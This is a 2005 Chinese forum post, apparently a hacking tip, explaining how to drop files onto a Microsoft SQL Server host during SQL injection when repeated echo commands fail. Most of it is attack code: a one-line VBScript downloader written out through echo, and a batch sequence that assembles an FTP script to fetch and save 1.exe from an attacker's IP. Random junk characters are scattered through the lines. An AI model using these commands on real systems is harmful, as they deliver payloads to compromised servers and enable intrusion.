QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2831|回复: 0
打印 上一主题 下一主题

mssql注射时不可以多次echo的解决办法

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2005-1-23 13:30 |只看该作者 |倒序浏览
|招呼Ta 关注Ta
<>解决办法: : {* C% y% t% }0 S
1.iget.vbs一次写入 ! a- z- U6 J# \2 T( @3 c7 x& E
在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写
" ^, G: h1 |" R2 y1 ~' w4 O6 ~0 G4 P
2 H# v/ F8 ?# }Set x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2
. r; V, A- }% q4 Y9 ?
! U$ }2 C) s. g7 s/ f这样我们可以一次echo成功,echo版本:
4 U9 n# a( S* j' d( x) _5 `6 s; ~& o& g# ?- y& f0 l' T& f
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 &gt;iget.vbs
$ t; M: C( D* i* C* R
8 e$ I, }5 N" [8 z: j4 _8 r+ g3 a
" _; Z. l+ w- d/ z& o( ~+ T+ D2.bat调用ftp脚本的写法(by envymask) - {9 E5 r9 \5 w! w( `3 m1 A, V

' S. m8 y/ Q# c9 Aecho ftp&gt;1.vbs
  l- B3 z. E' z/ aecho open ip&gt;2.vbs 8 X5 T+ d+ v( [7 \& v8 Z, G
echo u&gt;3.vbs / @9 t* d* D, H6 p9 `
echo s&gt;4.vbs & }7 y4 ?" Z% B7 U
echo binary&gt;5.vbs 8 x' v) r6 Y' a2 B& h+ @
echo get 1.exe&gt;6.vbs 6 w3 o. @0 N' E( x/ I! Y9 R1 [
echo bay&gt;7.vbs ( U0 M9 m. c$ |8 e) O' k) j6 K. D* s

% z. v2 g; p7 M  I. j* O8 c9 `* Ecopy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs : g& `0 v9 f: P4 V
</P>
zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-4-10 13:06 , Processed in 0.410347 second(s), 52 queries .

回顶部